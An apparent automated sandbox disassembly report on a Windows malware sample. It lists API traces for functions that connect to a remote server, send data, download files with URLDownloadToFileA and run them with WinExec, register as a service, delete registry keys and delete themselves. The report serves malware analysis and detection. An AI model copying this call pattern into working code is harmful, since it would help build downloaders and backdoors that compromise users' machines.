                                control_flow_graph 86 4048aa-404947 Sleep LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 40484f 89 404e7d-404e81 86->89 90 40494d-40497f call 403492 memset call 406090 call 4034e5 86->90 97 404981 90->97 98 404988-40498f 90->98 97->98 99 404991 98->99 100 404995-40499c 98->100 99->100 101 4049a2-4049ea memcpy send 100->101 102 40499e 100->102 103 4049f0-404a66 101->103 104 404e74 101->104 102->101 105 404a6b-404a8c memset call 4037ea 103->105 104->89 107 404a91-404a96 105->107 108 404e6b 107->108 109 404a9c-404ab9 call 4037ea 107->109 108->104 109->108 112 404abf-404ac8 109->112 113 404c46-404c49 112->113 114 404ace 112->114 117 404db7-404e4f GetTickCount wsprintfA LoadLibraryA GetProcAddress 113->117 118 404c4f-404c51 113->118 115 404e82-404e93 OpenMutexA 114->115 116 404ad4-404ad6 114->116 121 404ea3-404f83 call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 115->121 122 404e95-404e9d ReleaseMutex CloseHandle 115->122 123 404bf6-404c3b lstrcpyn call 403135 116->123 124 404adc-404add 116->124 153 404e51-404e54 117->153 154 404e56 117->154 119 404c53-404c55 118->119 120 404cc5-404cd6 OpenMutexA 118->120 119->105 125 404c5b-404cc0 GetDesktopWindow ShellExecuteA 119->125 126 404ce6-404dac call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 120->126 127 404cd8-404ce0 ReleaseMutex CloseHandle 120->127 122->121 137 404c40-404c41 123->137 131 404ae3-404ae4 124->131 132 404b75-404bf4 lstrcpyn lstrlen lstrcpyn call 403280 124->132 125->105 165 404db2 126->165 166 404f89-405077 call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 126->166 127->126 133 404ae6-404ae7 131->133 134 404b07-404b70 lstrcpyn lstrlen lstrcpyn call 403311 131->134 132->137 133->105 138 404ae9-404afa 133->138 134->137 137->105 138->105 143 404b00-404b02 138->143 143->105 156 404e58-404e66 WinExec 153->156 154->156 156->105 165->105
                                APIs
                                • Sleep.KERNELBASE(00004650), ref: 004048BB
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004048F9
                                • GetProcAddress.KERNEL32(00000000), ref: 00404902
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 0040490E
                                • GetProcAddress.KERNEL32(00000000), ref: 00404911
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 00404920
                                • GetProcAddress.KERNEL32(00000000), ref: 00404923
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00404932
                                • GetProcAddress.KERNEL32(00000000), ref: 00404935
                                  • Part of subcall function 0040484F: htons.WS2_32(00001F9A), ref: 00404861
                                  • Part of subcall function 0040484F: socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                  • Part of subcall function 0040484F: connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                  • Part of subcall function 0040484F: closesocket.WS2_32(00000000), ref: 0040489A
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 00404963
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 004049C1
                                • send.WS2_32(?,?,00000000), ref: 004049E1
                                • memset.MSVCRT ref: 00404A78
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00404B19
                                • lstrlen.KERNEL32(00409328,00000200), ref: 00404B25
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 00404B38
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00404BC9
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 00404BD5
                                • lstrcpyn.KERNEL32(00409160,?), ref: 00404BE8
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00404C08
                                • GetDesktopWindow.USER32 ref: 00404CB3
                                • ShellExecuteA.SHELL32(00000000), ref: 00404CBA
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404CCC
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404CD9
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE0
                                • wsprintfA.USER32 ref: 00404D67
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404D85
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404D90
                                • GetTickCount.KERNEL32 ref: 00404DF2
                                • wsprintfA.USER32 ref: 00404E05
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00404E23
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00404E2E
                                • WinExec.KERNEL32(?,00000000), ref: 00404E60
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00404E89
                                • ReleaseMutex.KERNEL32(00000000), ref: 00404E96
                                • CloseHandle.KERNEL32(00000000), ref: 00404E9D
                                • memset.MSVCRT ref: 00404EB8
                                • sprintf.MSVCRT ref: 00404F59
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00404F6E
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00404F83
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpyn$Mutexmemset$wsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShell_mbscpylstrlen$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSleepSystemThreadTickVariableWindowclosesocketconnecthtonsmemcpysendsetsockoptsocketsprintf
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 2152970890-2364854850
                                • Opcode ID: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                • Instruction ID: 34a9ccf79dfd8e924b7e3463a5d7c06d8bd6e6ee9c35ded2589a275d78ef8857
                                • Opcode Fuzzy Hash: 4f0d886bb70089ebf16781ed20cfd5bc5b80506e33529b3b2d0c9907bdf4c32f
                                • Instruction Fuzzy Hash: 4B32A771D042C8EEEB11DBA4CD48BDEBFB96B55304F0400A9E144B7292C7BE5A58CB79
                                Function 0040387C Relevance: 205.3, APIs: 44, Strings: 73, Instructions: 554librarystringloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 172 40387c-40390e LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress call 40336c 175 403e44-403e48 172->175 176 403914-403946 call 403492 memset call 406090 call 4034e5 172->176 183 403948 176->183 184 40394f-403956 176->184 183->184 185 403958 184->185 186 40395c-403963 184->186 185->186 187 403965 186->187 188 403969-4039b1 memcpy send 186->188 187->188 189 4039b7-403a2d 188->189 190 403e3b 188->190 191 403a32-403a53 memset call 4036c6 189->191 190->175 193 403a58-403a5d 191->193 194 403e32 193->194 195 403a63-403a80 call 4036c6 193->195 194->190 195->194 198 403a86-403a8f 195->198 199 403a95 198->199 200 403c0d-403c10 198->200 201 403e49-403e5a OpenMutexA 199->201 202 403a9b-403a9d 199->202 203 403c16-403c18 200->203 204 403d7e-403e16 GetTickCount wsprintfA LoadLibraryA GetProcAddress 200->204 209 403e6a-403f4a call 40351a memset sprintf SHDeleteKeyA call 40355b ExitProcess 201->209 210 403e5c-403e64 ReleaseMutex CloseHandle 201->210 205 403aa3-403aa4 202->205 206 403bbd-403c02 lstrcpyn call 403135 202->206 207 403c1a-403c1c 203->207 208 403c8c-403c9d OpenMutexA 203->208 237 403e18-403e1b 204->237 238 403e1d 204->238 212 403aaa-403aab 205->212 213 403b3c-403bbb lstrcpyn lstrlen lstrcpyn call 403280 205->213 219 403c07-403c08 206->219 207->191 214 403c22-403c87 GetDesktopWindow ShellExecuteA 207->214 215 403cad-403d73 call 406bd0 * 5 wsprintfA LoadLibraryA GetProcAddress 208->215 216 403c9f-403ca7 ReleaseMutex CloseHandle 208->216 210->209 220 403aad-403aae 212->220 221 403ace-403b37 lstrcpyn lstrlen lstrcpyn call 403311 212->221 213->219 214->191 251 403f50-40403e call 40351a memset sprintf SHDeleteKeyA call 40355b WinExec ExitProcess 215->251 252 403d79 215->252 216->215 219->191 220->191 226 403ab0-403ac1 220->226 221->219 226->191 230 403ac7-403ac9 226->230 230->191 242 403e1f-403e2d WinExec 237->242 238->242 242->191 252->191
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 004038C0
                                • GetProcAddress.KERNEL32(00000000), ref: 004038C9
                                • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA), ref: 004038D5
                                • GetProcAddress.KERNEL32(00000000), ref: 004038D8
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004038E7
                                • GetProcAddress.KERNEL32(00000000), ref: 004038EA
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 004038F9
                                • GetProcAddress.KERNEL32(00000000), ref: 004038FC
                                  • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,htons,76F8F550,76F90BD0,00000000), ref: 00403389
                                  • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 00403392
                                  • Part of subcall function 0040336C: LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                  • Part of subcall function 0040336C: GetProcAddress.KERNEL32(00000000), ref: 004033A0
                                  • Part of subcall function 0040336C: _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                  • Part of subcall function 0040336C: strstr.MSVCRT ref: 004033E0
                                  • Part of subcall function 0040336C: memset.MSVCRT ref: 004033F9
                                  • Part of subcall function 0040336C: strcspn.MSVCRT ref: 00403410
                                  • Part of subcall function 0040336C: strncpy.MSVCRT ref: 0040341B
                                  • Part of subcall function 0040336C: strcspn.MSVCRT ref: 0040342D
                                  • Part of subcall function 0040336C: atoi.MSVCRT(?), ref: 00403437
                                  • Part of subcall function 0040336C: socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                  • Part of subcall function 0040336C: connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                  • Part of subcall function 00403492: setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 004034A8
                                  • Part of subcall function 00403492: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 004034DD
                                • memset.MSVCRT ref: 0040392A
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey,76F8F550), ref: 004060A4
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060AB
                                  • Part of subcall function 00406090: LoadLibraryA.KERNEL32(KERNEL32.dll,GetVersionExA), ref: 004060C1
                                  • Part of subcall function 00406090: GetProcAddress.KERNEL32(00000000), ref: 004060C8
                                  • Part of subcall function 00406090: GetSystemDefaultUILanguage.KERNEL32 ref: 004060D4
                                  • Part of subcall function 00406090: memset.MSVCRT ref: 004060F2
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,0000004E), ref: 00406254
                                  • Part of subcall function 00406090: _mbscpy.MSVCRT(0000005D,2000), ref: 00406283
                                  • Part of subcall function 004034E5: wsprintfA.USER32 ref: 004034FC
                                  • Part of subcall function 004034E5: LoadLibraryA.KERNELBASE(?), ref: 0040350C
                                • memcpy.MSVCRT(?,?,000000B0), ref: 00403988
                                • send.WS2_32(?,?,00000000), ref: 004039A8
                                • memset.MSVCRT ref: 00403A3F
                                • lstrcpyn.KERNEL32(00409328,?,00000080), ref: 00403AE0
                                • lstrlen.KERNEL32(00409328,00000200), ref: 00403AEC
                                • lstrcpyn.KERNEL32(004093A8,?), ref: 00403AFF
                                • lstrcpyn.KERNEL32(004090E0,?,00000080), ref: 00403B90
                                • lstrlen.KERNEL32(004090E0,00000080), ref: 00403B9C
                                • lstrcpyn.KERNEL32(00409160,?), ref: 00403BAF
                                • lstrcpyn.KERNEL32(004091F8,?,00000104), ref: 00403BCF
                                • GetDesktopWindow.USER32 ref: 00403C7A
                                • ShellExecuteA.SHELL32(00000000), ref: 00403C81
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403C93
                                • ReleaseMutex.KERNEL32(00000000), ref: 00403CA0
                                • CloseHandle.KERNEL32(00000000), ref: 00403CA7
                                • wsprintfA.USER32 ref: 00403D2E
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403D4C
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403D57
                                • GetTickCount.KERNEL32 ref: 00403DB9
                                • wsprintfA.USER32 ref: 00403DCC
                                • LoadLibraryA.KERNEL32(urlmon.dll), ref: 00403DEA
                                • GetProcAddress.KERNEL32(00000000,URLDownloadToFileA), ref: 00403DF5
                                • WinExec.KERNEL32(?,00000000), ref: 00403E27
                                • OpenMutexA.KERNEL32(001F0001,00000000,Defghi Klmnopqr Tuv), ref: 00403E50
                                • ReleaseMutex.KERNEL32(00000000), ref: 00403E5D
                                • CloseHandle.KERNEL32(00000000), ref: 00403E64
                                • memset.MSVCRT ref: 00403E7F
                                • sprintf.MSVCRT ref: 00403F20
                                • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 00403F35
                                  • Part of subcall function 0040355B: LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA,00000000,Defghi Klmnopqr Tuv,00000000), ref: 00403571
                                  • Part of subcall function 0040355B: GetProcAddress.KERNEL32(00000000), ref: 00403578
                                  • Part of subcall function 0040355B: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004035D3
                                  • Part of subcall function 0040355B: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 004035E8
                                  • Part of subcall function 0040355B: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 004035FB
                                  • Part of subcall function 0040355B: ShellExecuteEx.SHELL32(0000003C), ref: 00403675
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(?,00000040), ref: 00403689
                                  • Part of subcall function 0040355B: GetCurrentProcess.KERNEL32(00000100), ref: 00403690
                                  • Part of subcall function 0040355B: SetPriorityClass.KERNEL32(00000000), ref: 00403697
                                  • Part of subcall function 0040355B: GetCurrentThread.KERNEL32 ref: 0040369B
                                • ExitProcess.KERNEL32 ref: 00403F4A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc$lstrcpynmemset$Mutex$_mbscpywsprintf$ClassCloseCurrentExecuteHandleNameOpenPriorityProcessReleaseShelllstrlenstrcspn$CountDefaultDeleteDesktopEnvironmentExecExitFileIoctlLanguageModulePathShortSystemThreadTickVariableWindowatoiconnectmemcpysendsetsockoptsocketsprintfstrncpystrstr
                                • String ID: %c%c%c%c%ccn.exe$%s%s$%s%s$.$C$C$Defghi Klmnopqr Tuv$E$F$GetTempPathA$KERNEL32.dll$M$S$S$S$S$T$URLDownloadToFileA$W$WS2_32.dll$Y$\$\$\$c$closesocket$e$e$e$e$e$e$e$e$e$e$e$i$i$i$i$kernel32.dll$kernel32.dll$l$l$l$lstrcatA$n$n$n$o$o$o$o$p$p$r$r$r$r$r$r$s$t$t$t$t$u$urlmon.dll$v$w$x$x
                                • API String ID: 1435032172-2364854850
                                • Opcode ID: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                • Instruction ID: 357b4b9f15481a77607b06fd34d37290313e3d44ecd54a07aa5cfd399732b663
                                • Opcode Fuzzy Hash: e18265d271f6721ab9e9e9466f504cf459dc78a50ec6928034f8974f6ee0d570
                                • Instruction Fuzzy Hash: 65329871D042C8EEEB11DBA4CD48BDE7FB96B15305F0400A9E184B7292C7BE5A58CB79
                                Function 004055BC Relevance: 131.5, APIs: 27, Strings: 48, Instructions: 204libraryloadersleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004055D8
                                • GetProcAddress.KERNEL32(00000000), ref: 004055E1
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 004055F1
                                • GetProcAddress.KERNEL32(00000000), ref: 004055F4
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegisterServiceCtrlHandlerA), ref: 004055FF
                                • GetProcAddress.KERNEL32(00000000), ref: 00405602
                                • SetServiceStatus.SECHOST(00000000,004090B8), ref: 00405655
                                • Sleep.KERNELBASE(000001F4), ref: 00405663
                                • LoadLibraryA.KERNEL32(0000004B,?), ref: 004056EF
                                • GetProcAddress.KERNEL32(00000000), ref: 004056F2
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,Get), ref: 0040574A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040574D
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,?), ref: 0040578A
                                • GetProcAddress.KERNEL32(00000000), ref: 0040578D
                                • CreateMutexA.KERNELBASE(00000000,00000000,Defghi Klmnopqr Tuv), ref: 00405796
                                • exit.MSVCRT ref: 004057A7
                                • wsprintfA.USER32 ref: 004057D2
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00002DD5,00000000,00000000,00000000), ref: 004057FF
                                • Sleep.KERNELBASE(000001F4), ref: 00405806
                                • WSAStartup.WS2_32(00000202,?), ref: 0040581E
                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005182,00000000,00000000,00000000), ref: 0040582A
                                • WSAStartup.WS2_32(00000202,?), ref: 00405838
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000051E3,00000000,00000000,00000000), ref: 00405844
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,Function_0000387C,00000000), ref: 00405859
                                • CloseHandle.KERNEL32 ref: 00405865
                                • closesocket.WS2_32 ref: 00405871
                                • Sleep.KERNELBASE(0000012C), ref: 00405883
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc$Create$SleepThread$Startup$CloseHandleMutexObjectServiceSingleStatusWaitclosesocketexitwsprintf
                                • String ID: A$ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$G$Get$I$KERNEL32.dll$L$M$RegisterServiceCtrlHandlerA$SetServiceStatus$T$WS2_32.dll$a$a$a$closesocket$d$d$e$e$e$e$e$e$h$hra%u.dll$n$o$r$r$r$r$r$r$r$s$t$t$t$t$t$u$u$x
                                • API String ID: 2081735817-3768298475
                                • Opcode ID: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
                                • Instruction ID: 2b90b7f98aae210445e73ef680a1d9401666750c7211a7faab133c9ec65b4e0f
                                • Opcode Fuzzy Hash: 0829bc5678a68e0c4557f189000b03db2788a54d9899d5a03469cd2d06e6fe48
                                • Instruction Fuzzy Hash: F3913670C082C8EDEB11D7A8DD4CBDEBFB99B15348F0440A9E54476292C7BD5A48CB7A
                                Function 00405348 Relevance: 121.0, APIs: 26, Strings: 43, Instructions: 211libraryloaderregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegQueryValueExA), ref: 00405365
                                • GetProcAddress.KERNEL32(00000000), ref: 0040536E
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCloseKey), ref: 00405379
                                • GetProcAddress.KERNEL32(00000000), ref: 0040537C
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 0040538B
                                • GetProcAddress.KERNEL32(00000000), ref: 0040538E
                                • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 0040539D
                                • GetProcAddress.KERNEL32(00000000), ref: 004053A0
                                • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,000F003F,?), ref: 00405464
                                • memset.MSVCRT ref: 00405483
                                • RegQueryValueExA.KERNELBASE(?,00000049,00000000,00000000,?,?), ref: 004054C6
                                • RegCloseKey.KERNELBASE(?), ref: 004054D5
                                • GetFileAttributesA.KERNELBASE(?), ref: 004054DF
                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004054FD
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040550C
                                • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 0040551C
                                • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00405533
                                • GlobalFree.KERNEL32(?), ref: 00405540
                                • CloseHandle.KERNEL32(00000000), ref: 00405547
                                • CloseHandle.KERNELBASE(00000000), ref: 00405552
                                • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 0040555C
                                • UpdateResourceA.KERNEL32(00000000,0000000A,00000066,00000000,?,?), ref: 0040557B
                                • lstrlen.KERNEL32(Defghi Klmnopqr Tuv), ref: 00405585
                                • UpdateResourceA.KERNEL32(?,0000000A,00000065,00000000,Defghi Klmnopqr Tuv,00000001), ref: 00405596
                                • EndUpdateResourceA.KERNEL32(?,00000000), ref: 0040559F
                                • GlobalFree.KERNEL32(?), ref: 004055AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressFileLibraryLoadProcResourceUpdate$CloseGlobal$FreeHandle$AllocAttributesBeginCreateOpenQueryReadSizeValuelstrlenmemset
                                • String ID: ADVAPI32.dll$C$C$Defghi Klmnopqr Tuv$E$ImagePath$KERNEL32.dll$KERNEL32.dll$M$RegCloseKey$RegQueryValueExA$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lstrcatA$lstrcpyA$n$n$o$o$r$r$r$r$s$t$t$t$u$v
                                • API String ID: 2023098254-1497069993
                                • Opcode ID: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                • Instruction ID: 857f389ec30b06542d6cc4631e69be42d6d6ae2a8b7d483b04e891210c00ca0b
                                • Opcode Fuzzy Hash: 5691daac4824de2b6841b4b3c6b5525a01462119fc2637b3c2951bed404fc92c
                                • Instruction Fuzzy Hash: 14816070D042C8EEEF119BA4DC48BEFBEB99F15344F040065F544B62A1D7B94A48CB79
                                Function 00402DD5 Relevance: 91.2, APIs: 8, Strings: 44, Instructions: 166networksleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 357 402dd5-402f90 call 402a59 360 402f96-402fc2 gethostname 357->360 361 4030f8-4030fa 357->361 362 402fc8-402fdc gethostbyname 360->362 363 4030ed-4030f7 WSACleanup 360->363 362->363 364 402fe2-402fe4 362->364 363->361 365 402fe7-402fed 364->365 365->363 366 402ff3-403035 memset memcpy 365->366 367 403036-40307f memset sprintf 366->367 368 403081 367->368 369 4030cb-4030db 367->369 371 403084-40308b 368->371 369->367 370 4030e1-4030e8 369->370 370->365 372 4030c4-4030c9 371->372 373 40308d 371->373 372->369 372->371 374 403093-4030a5 Sleep 373->374 375 4030c1 374->375 376 4030a7-4030b2 call 402ad0 374->376 375->372 378 4030b7-4030bf 376->378 378->374 378->375
                                APIs
                                  • Part of subcall function 00402A59: WSAStartup.WS2_32(00000202,?), ref: 00402A6E
                                • gethostname.WS2_32(?,00000080), ref: 00402FBA
                                • gethostbyname.WS2_32(?), ref: 00402FCF
                                • memset.MSVCRT ref: 00402FFA
                                • memcpy.MSVCRT(?,00000000,?,?,00000000,00000010), ref: 0040300E
                                • memset.MSVCRT ref: 00403049
                                • sprintf.MSVCRT ref: 0040306F
                                • Sleep.KERNELBASE(000000C8), ref: 00403098
                                • WSACleanup.WS2_32 ref: 004030ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3258916401.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.3254435227.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3258916401.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3268425221.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000004.00000002.3275349436.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$CleanupSleepStartupgethostbynamegethostnamememcpysprintf
